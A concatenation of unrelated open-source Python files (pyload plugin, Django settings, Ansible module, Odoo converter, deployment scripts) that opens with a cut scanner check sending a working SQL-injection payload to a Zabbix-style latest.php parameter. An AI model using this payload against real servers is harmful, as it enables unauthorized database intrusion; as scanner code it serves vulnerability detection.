opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
request = opener.open(url + "/dashboard.php", timeout=timeout)
res_html = request.read()
except:
return
if 'href="slides.php?sid=' in res_html:
m = re.search(r'href="slides\.php\?sid=(.+?)">', res_html, re.M | re.I)
if m:
sid = m.group(1)
payload = "/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=(select%20updatexml(1,concat(0x7e,(SELECT%20md5(666)),0x7e),1))".format(
sid=sid)
res_html = opener.open(url + payload, timeout=timeout).read()
if 'fae0b27c451c728867a567e8c1bb4e5' in res_html:
return u"存在SQL注入,POC:" + payload
|
gpl-3.0
|
Rusk85/pyload
|
module/plugins/accounts/UploadingCom.py
|
3
|
2038
|
# -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay
"""
from time import time, strptime, mktime
import re
from module.plugins.Account import Account
class UploadingCom(Account):
__name__ = "UploadingCom"
__version__ = "0.1"
__type__ = "account"
__description__ = """uploading.com account plugin"""
__author_name__ = ("mkaay")
__author_mail__ = ("mkaay@mkaay.de")
def loadAccountInfo(self, user, req):
src = req.load("http://uploading.com/")
premium = True
if "UPGRADE TO PREMIUM" in src:
return {"validuntil": -1, "trafficleft": -1, "premium": False}
m = re.search("Valid Until:(.*?)<", src)
if m:
validuntil = int(mktime(strptime(m.group(1).strip(), "%b %d, %Y")))
else:
validuntil = -1
return {"validuntil": validuntil, "trafficleft": -1, "premium": True}
def login(self, user, data, req):
req.cj.setCookie("uploading.com", "lang", "1")
req.cj.setCookie("uploading.com", "language", "1")
req.cj.setCookie("uploading.com", "setlang", "en")
req.cj.setCookie("uploading.com", "_lang", "en")
req.load("http://uploading.com/")
req.load("http://uploading.com/general/login_form/?JsHttpRequest=%s-xml" % long(time() * 1000),
post={"email": user, "password": data["password"], "remember": "on"})
|
gpl-3.0
|
yu-aosp-staging/android_kernel_yu_msm8916
|
arch/ia64/scripts/unwcheck.py
|
13143
|
1714
|
#!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
|
gpl-2.0
|
undoware/neutron-drive
|
google_appengine/lib/django_0_96/django/conf/global_settings.py
|
30
|
11682
|
# Default Django settings. Override these with settings in the module
# pointed-to by the DJANGO_SETTINGS_MODULE environment variable.
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
gettext_noop = lambda s: s
####################
# CORE #
####################
DEBUG = False
TEMPLATE_DEBUG = False
# Whether to use the "Etag" header. This saves bandwidth but slows down performance.
USE_ETAGS = False
# People who get code error notifications.
# In the format (('Full Name', 'email@domain.com'), ('Full Name', 'anotheremail@domain.com'))
ADMINS = ()
# Tuple of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = ()
# Local time zone for this installation. All choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box. The language name
# should be the utf-8 encoded local name for the language.
LANGUAGES = (
('ar', gettext_noop('Arabic')),
('bn', gettext_noop('Bengali')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('es', gettext_noop('Spanish')),
('es_AR', gettext_noop('Argentinean Spanish')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('gl', gettext_noop('Galician')),
('hu', gettext_noop('Hungarian')),
('he', gettext_noop('Hebrew')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('kn', gettext_noop('Kannada')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('nl', gettext_noop('Dutch')),
('no', gettext_noop('Norwegian')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portugese')),
('pt-br', gettext_noop('Brazilian')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sr', gettext_noop('Serbian')),
('sv', gettext_noop('Swedish')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('tr', gettext_noop('Turkish')),
('uk', gettext_noop('Ukrainian')),
('zh-cn', gettext_noop('Simplified Chinese')),
('zh-tw', gettext_noop('Traditional Chinese')),
)
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ("he", "ar")
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various e-mails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
# Content-Type header.
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
# E-mail address that error messages come from.
SERVER_EMAIL = 'root@localhost'
# Whether to send broken-link e-mails.
SEND_BROKEN_LINK_EMAILS = False
# Database connection info.
DATABASE_ENGINE = '' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = '' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.
DATABASE_OPTIONS = {} # Set to empty dictionary for default.
# Host for sending e-mail.
EMAIL_HOST = 'localhost'
# Port for sending e-mail.
EMAIL_PORT = 25
# Optional SMTP authentication information for EMAIL_HOST.
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
# List of strings representing installed apps.
INSTALLED_APPS = ()
# List of locations of the template source files, in search order.
TEMPLATE_DIRS = ()
# List of callables that know how to import templates from various sources.
# See the comments in django/core/template/loader.py for interface
# documentation.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
# 'django.template.loaders.eggs.load_template_source',
)
# List of processors used by RequestContext to populate the context.
# Each one should be a callable that takes the request object as its
# only parameter and returns a dictionary to add to the context.
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
# 'django.core.context_processors.request',
)
# Output to use in template system for invalid (e.g. misspelled) variables.
TEMPLATE_STRING_IF_INVALID = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Default e-mail address to use for various automated correspondence from
# the site managers.
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
# Subject-line prefix for email messages send with django.core.mail.mail_admins
# or ...mail_managers. Make sure to include the trailing space.
EMAIL_SUBJECT_PREFIX = '[Django] '
# Whether to append trailing slashes to URLs.
APPEND_SLASH = True
# Whether to prepend the "www." subdomain to URLs that don't have it.
PREPEND_WWW = False
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = (
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# )
DISALLOWED_USER_AGENTS = ()
ABSOLUTE_URL_OVERRIDES = {}
# Tuple of strings representing allowed prefixes for the {% ssi %} tag.
# Example: ('/home/html', '/var/www')
ALLOWED_INCLUDE_ROOTS = ()
# If this is a admin settings module, this should be a list of
# settings modules (in the format 'foo.bar.baz') for which this admin
# is an admin.
ADMIN_FOR = ()
# 404s that may be ignored.
IGNORABLE_404_STARTS = ('/cgi-bin/', '/_vti_bin', '/_vti_inf')
IGNORABLE_404_ENDS = ('mail.pl', 'mailform.pl', 'mail.cgi', 'mailform.cgi', 'favicon.ico', '.php')
# A secret key for this particular Django installation. Used in secret-key
# hashing algorithms. Set this in your settings, or Django will complain
# loudly.
SECRET_KEY = ''
# Path to the "jing" executable -- needed to validate XMLFields
JING_PATH = "/usr/bin/jing"
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
# Default formatting for date objects. See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
TIME_FORMAT = 'P'
# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://www.djangoproject.com/documentation/templates/#now
MONTH_DAY_FORMAT = 'F j'
# Do you want to manage transactions manually?
# Hint: you really don't!
TRANSACTIONS_MANAGED = False
# The User-Agent string to use when checking for URL validity through the
# isExistingURL validator.
URL_VALIDATOR_USER_AGENT = "Django/0.96.2 (http://www.djangoproject.com)"
##############
# MIDDLEWARE #
##############
# List of middleware classes to use. Order is important; in the request phase,
# this middleware classes will be applied in the order given, and in the
# response phase the middleware will be applied in reverse order.
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.middleware.http.ConditionalGetMiddleware',
# 'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.doc.XViewMiddleware',
)
############
# SESSIONS #
############
SESSION_COOKIE_NAME = 'sessionid' # Cookie name. This can be whatever you want.
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2 # Age of cookie, in seconds (default: 2 weeks).
SESSION_COOKIE_DOMAIN = None # A string like ".lawrence.com", or None for standard domain cookie.
SESSION_COOKIE_SECURE = False # Whether the session cookie should be secure (https:// only).
SESSION_SAVE_EVERY_REQUEST = False # Whether to save the session data on every request.
SESSION_EXPIRE_AT_BROWSER_CLOSE = False # Whether sessions expire when a user closes his browser.
#########
# CACHE #
#########
# The cache backend to use. See the docstring in django.core.cache for the
# possible values.
CACHE_BACKEND = 'simple://'
CACHE_MIDDLEWARE_KEY_PREFIX = ''
####################
# COMMENTS #
####################
COMMENTS_ALLOW_PROFANITIES = False
# The profanities that will trigger a validation error in the
# 'hasNoProfanities' validator. All of these should be in lowercase.
PROFANITIES_LIST = ('asshat', 'asshead', 'asshole', 'cunt', 'fuck', 'gook', 'nigger', 'shit')
# The group ID that designates which users are banned.
# Set to None if you're not using it.
COMMENTS_BANNED_USERS_GROUP = None
# The group ID that designates which users can moderate comments.
# Set to None if you're not using it.
COMMENTS_MODERATORS_GROUP = None
# The group ID that designates the users whose comments should be e-mailed to MANAGERS.
# Set to None if you're not using it.
COMMENTS_SKETCHY_USERS_GROUP = None
# The system will e-mail MANAGERS the first COMMENTS_FIRST_FEW comments by each
# user. Set this to 0 if you want to disable it.
COMMENTS_FIRST_FEW = 0
# A tuple of IP addresses that have been banned from participating in various
# Django-powered features.
BANNED_IPS = ()
##################
# AUTHENTICATION #
##################
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',)
###########
# TESTING #
###########
# The name of the method to use to invoke the test suite
TEST_RUNNER = 'django.test.simple.run_tests'
# The name of the database to use for testing purposes.
# If None, a name of 'test_' + DATABASE_NAME will be assumed
TEST_DATABASE_NAME = None
############
# FIXTURES #
############
# The list of directories to search for fixtures
FIXTURE_DIRS = ()
|
bsd-3-clause
|
greyshell/Pen-Test
|
leetcode/factorial.py
|
1
|
1129
|
#!/usr/bin/python
# author: greyshell
"""
[+] problem description
=======================
find the factorial of a number
1) recursive two_sum
2) tail recursive two_sum
[+] reference
=============
TBD
"""
def tail_recursion_driver(n):
"""
tail recursive two_sum
:param n: int
:return: int
"""
return factorial_tail_recursion(n, 1) # 1 is used to start the first accumulation
def factorial_tail_recursion(n, a):
"""
better than normal recursion as it could be optimized by the compiler by not saving the current stack frame
:param n: int
:param a: int => it accumulates the result
:return: int
"""
if n == 1 or n == 0:
return a # it carries the final result
else:
return factorial_tail_recursion(n - 1, n * a)
def factorial(n):
"""
normal recursive two_sum
:return: int
"""
if n == 1 or n == 0: # base case for n = 0, 1
return 1
else: # recursive case when n > 1
return n * factorial(n - 1)
def main():
print tail_recursion_driver(12)
print factorial(0)
if __name__ == '__main__':
main()
|
mit
|
bxshi/gem5
|
src/mem/slicc/ast/TypeFieldAST.py
|
92
|
1754
|
# Copyright (c) 1999-2008 Mark D. Hill and David A. Wood
# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.ast.AST import AST
class TypeFieldAST(AST):
def __init__(self, slicc, pairs):
super(TypeFieldAST, self).__init__(slicc, pairs)
|
bsd-3-clause
|
tapanagupta/mi-instrument
|
mi/platform/test/test_mission_exec.py
|
9
|
1320
|
# #!/usr/bin/env python
#
# """
# @package ion.agents.platform.test.test_mission_exec
# @file ion/agents/platform/test/test_mission_exec.py
# @author Edward Hunter
# @brief Test cases mission exec opt-in classes.
# """
#
# __author__ = 'Edward Hunter'
# __license__ = 'Apache 2.0'
#
# # Import pyon test class first.
# from pyon.util.int_test import IonIntegrationTestCase
#
#
# # Nose imports.
# from nose.plugins.attrib import attr
#
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_mission_exec.py:TestMissionExec
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_mission_exec.py:TestMissionExec.test_mission_loader
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_mission_exec.py:TestMissionExec.test_mission_exec
#
#
# @attr('INT', group='sa')
# class TestMissionExec(IonIntegrationTestCase):
# """
# Test cases mission exec opt-in classes.
# """
#
# def setUp(self):
# """
# Common test setup.
# @return:
# """
# pass
#
#
# def test_mission_loader(self):
# """
# Test mission loader class.
# @return:
# """
# pass
#
#
# def test_mission_exec(self):
# """
# Test mission executive class.
# @return:
# """
# pass
|
bsd-2-clause
|
timothyclemansinsea/smc
|
src/k8s/smc-hub/control.py
|
1
|
9152
|
#!/usr/bin/env python3
"""
Hub management script
"""
import os, shutil, sys, tempfile
join = os.path.join
# Boilerplate to ensure we are in the directory fo this path and make the util module available.
SCRIPT_PATH = os.path.split(os.path.realpath(__file__))[0]
sys.path.insert(0, os.path.abspath(os.path.join(SCRIPT_PATH, '..', 'util')))
os.chdir(SCRIPT_PATH)
import util
# For now in all cases, we just call the container the following; really it should
# maybe be smc-webapp-static#sha1hash, which makes switching between versions easy, etc.
NAME='smc-hub'
SECRETS = os.path.abspath(join(SCRIPT_PATH, '..', '..', 'data', 'secrets'))
def build(tag, rebuild, upgrade=False, commit=None):
"""
Build Docker container by installing and building everything inside the container itself, and
NOT using ../../static/ on host.
"""
# First build smc-hub-base, which is generic install of ubuntu packages, so we should rarely
# clear the cache for this.
v = ['sudo', 'docker', 'build', '-t', '{name}-base'.format(name=NAME)]
if upgrade:
v.append("--no-cache")
v.append(".")
util.run(v, path=join(SCRIPT_PATH, 'image-base'))
# Next build smc-hub, which depends on smc-hub-base.
v = ['sudo', 'docker', 'build', '-t', tag]
if commit:
v.append("--build-arg")
v.append("commit={commit}".format(commit=commit))
if rebuild: # will cause a git pull to happen
v.append("--no-cache")
v.append('.')
util.run(v, path=join(SCRIPT_PATH,'image'))
def build_docker(args):
if args.commit:
args.tag += ('-' if args.tag else '') + args.commit[:6]
tag = util.get_tag(args, NAME)
build(tag, args.rebuild, args.upgrade, args.commit)
if not args.local:
util.gcloud_docker_push(tag)
def run_on_kubernetes(args):
if args.test:
rethink_cpu_request = hub_cpu_request = '10m'
rethink_memory_request = hub_memory_request = '200Mi'
else:
hub_cpu_request = '300m'
hub_memory_request = '1Gi'
rethink_cpu_request = '300m'
rethink_memory_request = '1Gi'
util.ensure_secret_exists('sendgrid-api-key', 'sendgrid')
util.ensure_secret_exists('zendesk-api-key', 'zendesk')
args.local = False # so tag is for gcloud
if args.replicas is None:
args.replicas = util.get_desired_replicas(NAME, 2)
tag = util.get_tag(args, NAME, build)
opts = {
'image_hub' : tag,
'replicas' : args.replicas,
'pull_policy' : util.pull_policy(args),
'min_read_seconds' : args.gentle,
'smc_db_hosts' : args.database_nodes,
'smc_db_pool' : args.database_pool_size,
'smc_db_concurrent_warn' : args.database_concurrent_warn,
'hub_cpu_request' : hub_cpu_request,
'hub_memory_request' : hub_memory_request,
'rethink_cpu_request' : rethink_cpu_request,
'rethink_memory_request' : rethink_memory_request
}
if args.database_nodes == 'localhost':
from argparse import Namespace
ns = Namespace(tag=args.rethinkdb_proxy_tag, local=False)
opts['image_rethinkdb_proxy'] = util.get_tag(ns, 'rethinkdb-proxy', build)
filename = 'smc-hub-rethinkdb-proxy.template.yaml'
else:
filename = '{name}.template.yaml'.format(name=NAME)
t = open(join('conf', filename)).read()
with tempfile.NamedTemporaryFile(suffix='.yaml', mode='w') as tmp:
r = t.format(**opts)
#print(r)
tmp.write(r)
tmp.flush()
util.update_deployment(tmp.name)
if NAME not in util.get_services():
util.run(['kubectl', 'expose', 'deployment', NAME])
def stop_on_kubernetes(args):
util.stop_deployment(NAME)
def load_secret(name, args):
path = args.path
if not os.path.exists(path):
os.makedirs(path)
if not os.path.isdir(path):
raise RuntimeError("path='{path}' must be a directory".format(path=path))
file = join(path, name)
if not os.path.exists(file):
raise RuntimeError("'{file}' must exist".format(file=file))
util.create_secret(name+'-api-key', file)
def status(args):
# Get all pod names
v = util.get_pods(run=NAME)
print("Getting last %s lines of logs from %s pods"%(args.tail, len(v)))
for x in v:
lg = util.get_logs(x['NAME'], tail=args.tail, container='smc-hub').splitlines()
blocked = concurrent = 0
for w in lg:
if 'BLOCKED for' in w: # 2016-07-07T17:39:23.159Z - debug: BLOCKED for 1925ms
b = int(w.split()[-1][:-2])
blocked = max(blocked, b)
if 'concurrent]' in w: # 2016-07-07T17:41:16.226Z - debug: [1 concurrent] ...
concurrent = max(concurrent, int(w.split()[3][1:]))
x['blocked'] = blocked
x['concurrent'] = concurrent
bad = util.run("kubectl describe pod {name} |grep Unhealthy |tail -1 ".format(name=x['NAME']), get_output=True, verbose=False).splitlines()
if len(bad) > 0:
x['unhealthy'] = bad[-1].split()[0]
else:
x['unhealthy'] = ''
print("%-30s%-12s%-12s%-12s%-12s%-12s"%('NAME', 'CONCURRENT', 'BLOCKED', 'UNHEALTHY', 'RESTARTS', 'AGE'))
for x in v:
print("%-30s%-12s%-12s%-12s%-12s%-12s"%(x['NAME'], x['concurrent'], x['blocked'], x['unhealthy'], x['RESTARTS'], x['AGE']))
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Control deployment of {name}'.format(name=NAME))
subparsers = parser.add_subparsers(help='sub-command help')
sub = subparsers.add_parser('build', help='build docker image')
sub.add_argument("-t", "--tag", default="", help="tag for this build")
sub.add_argument("-c", "--commit", default='',
help="build a particular sha1 commit; the commit is automatically appended to the tag")
sub.add_argument("-r", "--rebuild", action="store_true",
help="re-pull latest hub source code from git and install any dependencies")
sub.add_argument("-u", "--upgrade", action="store_true",
help="re-install the base Ubuntu packages")
sub.add_argument("-l", "--local", action="store_true",
help="only build the image locally; don't push it to gcloud docker repo")
sub.set_defaults(func=build_docker)
sub = subparsers.add_parser('run', help='create/update {name} deployment on the currently selected kubernetes cluster'.format(name=NAME))
sub.add_argument("-t", "--tag", default="", help="tag of the image to run")
sub.add_argument("-r", "--replicas", default=None, help="number of replicas")
sub.add_argument("-f", "--force", action="store_true", help="force reload image in k8s")
sub.add_argument("-g", "--gentle", default=30, type=int,
help="how gentle to be in doing the rolling update; in particular, will wait about this many seconds after each pod starts up (default: 30)")
sub.add_argument("-d", "--database-nodes", default='localhost', type=str, help="database to connect to. If 'localhost' (the default), will run a local rethindkb proxy that is itself pointed at the rethinkdb-cluster service; if 'rethinkdb-proxy' will use that service.")
sub.add_argument("-p", "--database-pool-size", default=50, type=int, help="size of database connection pool")
sub.add_argument("--database-concurrent-warn", default=300, type=int, help="if this many concurrent queries for sustained time, kill container")
sub.add_argument("--rethinkdb-proxy-tag", default="", help="tag of rethinkdb-proxy image to run")
sub.add_argument("--test", action="store_true", help="using for testing so make very minimal resource requirements")
sub.set_defaults(func=run_on_kubernetes)
sub = subparsers.add_parser('delete', help='delete the deployment')
sub.set_defaults(func=stop_on_kubernetes)
sub = subparsers.add_parser('load-sendgrid', help='load the sendgrid password into k8s from disk',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
sub.add_argument('path', type=str, help='path to directory that contains the password in a file named "sendgrid"')
sub.set_defaults(func=lambda args: load_secret('sendgrid',args))
sub = subparsers.add_parser('load-zendesk', help='load the zendesk password into k8s from disk',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
sub.add_argument('path', type=str, help='path to directory that contains the password in a file named "zendesk"')
sub.set_defaults(func=lambda args: load_secret('zendesk',args))
util.add_deployment_parsers(NAME, subparsers, default_container='smc-hub')
sub = subparsers.add_parser('status', help='display status info about concurrent and blocked, based on recent logs')
sub.add_argument("-t", "--tail", default=100, type=int, help="how far back to go in log")
sub.set_defaults(func=status)
args = parser.parse_args()
if hasattr(args, 'func'):
args.func(args)
|
gpl-3.0
|
albertomurillo/ansible
|
lib/ansible/modules/utilities/logic/assert.py
|
45
|
2312
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Dag Wieers <dag@wieers.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: assert
short_description: Asserts given expressions are true
description:
- This module asserts that given expressions are true with an optional custom message.
- This module is also supported for Windows targets.
version_added: "1.5"
options:
that:
description:
- A list of string expressions of the same form that can be passed to the 'when' statement.
type: list
required: true
fail_msg:
description:
- The customized message used for a failing assertion.
- This argument was called 'msg' before Ansible 2.7, now it is renamed to 'fail_msg' with alias 'msg'.
type: str
aliases: [ msg ]
version_added: "2.7"
success_msg:
description:
- The customized message used for a successful assertion.
type: str
version_added: "2.7"
quiet:
description:
- Set this to C(yes) to avoid verbose output.
type: bool
default: no
version_added: "2.8"
notes:
- This module is also supported for Windows targets.
seealso:
- module: debug
- module: fail
- module: meta
author:
- Ansible Core Team
- Michael DeHaan
'''
EXAMPLES = r'''
- assert: { that: "ansible_os_family != 'RedHat'" }
- assert:
that:
- "'foo' in some_command_result.stdout"
- number_of_the_counting == 3
- name: After version 2.7 both 'msg' and 'fail_msg' can customize failing assertion message
assert:
that:
- my_param <= 100
- my_param >= 0
fail_msg: "'my_param' must be between 0 and 100"
success_msg: "'my_param' is between 0 and 100"
- name: Please use 'msg' when ansible version is smaller than 2.7
assert:
that:
- my_param <= 100
- my_param >= 0
msg: "'my_param' must be between 0 and 100"
- name: use quiet to avoid verbose output
assert:
that:
- my_param <= 100
- my_param >= 0
quiet: true
'''
|
gpl-3.0
|
ritchyteam/odoo
|
openerp/addons/base/ir/ir_fields.py
|
47
|
18497
|
# -*- coding: utf-8 -*-
import cStringIO
import datetime
import functools
import itertools
import time
import psycopg2
import pytz
from openerp.osv import orm
from openerp.tools.translate import _
from openerp.tools.misc import DEFAULT_SERVER_DATE_FORMAT,\
DEFAULT_SERVER_DATETIME_FORMAT,\
ustr
from openerp.tools import html_sanitize
REFERENCING_FIELDS = set([None, 'id', '.id'])
def only_ref_fields(record):
return dict((k, v) for k, v in record.iteritems()
if k in REFERENCING_FIELDS)
def exclude_ref_fields(record):
return dict((k, v) for k, v in record.iteritems()
if k not in REFERENCING_FIELDS)
CREATE = lambda values: (0, False, values)
UPDATE = lambda id, values: (1, id, values)
DELETE = lambda id: (2, id, False)
FORGET = lambda id: (3, id, False)
LINK_TO = lambda id: (4, id, False)
DELETE_ALL = lambda: (5, False, False)
REPLACE_WITH = lambda ids: (6, False, ids)
class ImportWarning(Warning):
""" Used to send warnings upwards the stack during the import process """
pass
class ConversionNotFound(ValueError): pass
class ColumnWrapper(object):
def __init__(self, column, cr, uid, pool, fromtype, context=None):
self._converter = None
self._column = column
if column._obj:
self._pool = pool
self._converter_args = {
'cr': cr,
'uid': uid,
'model': pool[column._obj],
'fromtype': fromtype,
'context': context
}
@property
def converter(self):
if not self._converter:
self._converter = self._pool['ir.fields.converter'].for_model(
**self._converter_args)
return self._converter
def __getattr__(self, item):
return getattr(self._column, item)
class ir_fields_converter(orm.Model):
_name = 'ir.fields.converter'
def for_model(self, cr, uid, model, fromtype=str, context=None):
""" Returns a converter object for the model. A converter is a
callable taking a record-ish (a dictionary representing an openerp
record with values of typetag ``fromtype``) and returning a converted
records matching what :meth:`openerp.osv.orm.Model.write` expects.
:param model: :class:`openerp.osv.orm.Model` for the conversion base
:returns: a converter callable
:rtype: (record: dict, logger: (field, error) -> None) -> dict
"""
columns = dict(
(k, ColumnWrapper(v.column, cr, uid, self.pool, fromtype, context))
for k, v in model._all_columns.iteritems())
converters = dict(
(k, self.to_field(cr, uid, model, column, fromtype, context))
for k, column in columns.iteritems())
def fn(record, log):
converted = {}
for field, value in record.iteritems():
if field in (None, 'id', '.id'): continue
if not value:
converted[field] = False
continue
try:
converted[field], ws = converters[field](value)
for w in ws:
if isinstance(w, basestring):
# wrap warning string in an ImportWarning for
# uniform handling
w = ImportWarning(w)
log(field, w)
except ValueError, e:
log(field, e)
return converted
return fn
def to_field(self, cr, uid, model, column, fromtype=str, context=None):
""" Fetches a converter for the provided column object, from the
specified type.
A converter is simply a callable taking a value of type ``fromtype``
(or a composite of ``fromtype``, e.g. list or dict) and returning a
value acceptable for a write() on the column ``column``.
By default, tries to get a method on itself with a name matching the
pattern ``_$fromtype_to_$column._type`` and returns it.
Converter callables can either return a value and a list of warnings
to their caller or raise ``ValueError``, which will be interpreted as a
validation & conversion failure.
ValueError can have either one or two parameters. The first parameter
is mandatory, **must** be a unicode string and will be used as the
